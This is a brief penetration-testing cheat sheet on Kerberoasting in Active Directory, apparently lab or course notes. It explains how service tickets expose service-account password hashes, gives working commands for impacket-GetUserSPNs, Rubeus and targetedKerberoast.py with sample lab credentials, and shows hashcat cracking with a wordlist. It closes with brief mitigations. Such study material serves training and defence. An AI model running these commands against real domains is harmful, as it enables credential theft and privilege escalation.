Kerberoasting

Overview

This attack takes advantage of service accounts that use Kerberos authentication.

First we request a TGT (Ticket Granting Ticket) from the KDC using the account we compromised. Next we request a TGS (Ticket Granting Service ticket) as well. The key flaw is that the TGS is encrypted with the Services account password hash.

Using the tool GetUserSPNs to request a TGS and obtain the Service accounts password hash.

GetUserSPNs

sudo impacket-GetUserSPNs PNPT.local/greg:Password1 -dc-ip 192.168.1.129 -request
hashcat -m 13100 crackme.txt ~/rockyou.txt -O

Rubeus

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Targeted Kerberoast

python targetedKerberoast.py -v -d offsec.lab -u hrapp -p 'Untimed$Runny'

Mitigation

  • Strong password policy

  • Principle of least privilege

  • Service accounts should NOT be Domain Administrators

Last updated